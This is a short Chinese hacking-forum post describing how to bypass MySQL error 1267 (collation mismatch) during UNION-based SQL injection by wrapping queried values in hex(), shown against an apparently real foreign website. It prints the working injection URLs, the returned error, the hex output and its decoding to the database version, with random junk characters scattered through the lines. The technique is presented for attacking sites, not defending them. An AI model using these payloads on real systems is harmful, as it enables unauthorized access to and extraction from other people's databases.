找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1791|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei. \& F' u- V( D6 `  J- _1 [
文章性质:原创
; C! Q  X8 t& A8 [, f) m0 l1 ^发布日期:2005-10-18
$ ]; b  Y8 k% a测试个国外的站时:
5 _9 e: N. \& N4 Xurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
9 O  J/ o# ~8 K* n8 b. V3 I/ ]8 P返回错误:
6 S6 F& `5 }3 TIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'$ Q& O9 b% e0 K( E1 w& J
MySQL Error No. 126
& v; ^( ^' N  u$ ]8 }看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
% `/ B) W) D2 i; }. k解决办法:转为其他编码如hex。2 t. r/ n: K  o% z8 M$ U2 |6 r
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*/ j' k) k  ]: h+ ?
成功得到hex(version())的值为:3 t4 u) t: l( R0 r' w# V. S/ W
342E312E332D62657461
9 r0 j% z& S( b) g; m回Mysql查询下得到:
6 {7 Z* f/ n" ]3 U: Bmysql> select 0x342E312E332D62657461;
- R. P8 G9 P  T8 h+------------------------+
4 {" R$ }) w# V' m/ J| 0x342E312E332D62657461 |
* H) e& v$ }' Z& t+------------------------+
0 X4 u$ `' c# d| 4.1.3-beta |( V3 I9 u; n. L  s. p) F& }+ A( ]
+------------------------+
5 S9 O1 `* i5 {% m( x) T; A1 row in set (0.00 sec)' Q; d2 v* }. _1 X# H

( h& A- ^8 o; ?! V# n, b& V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表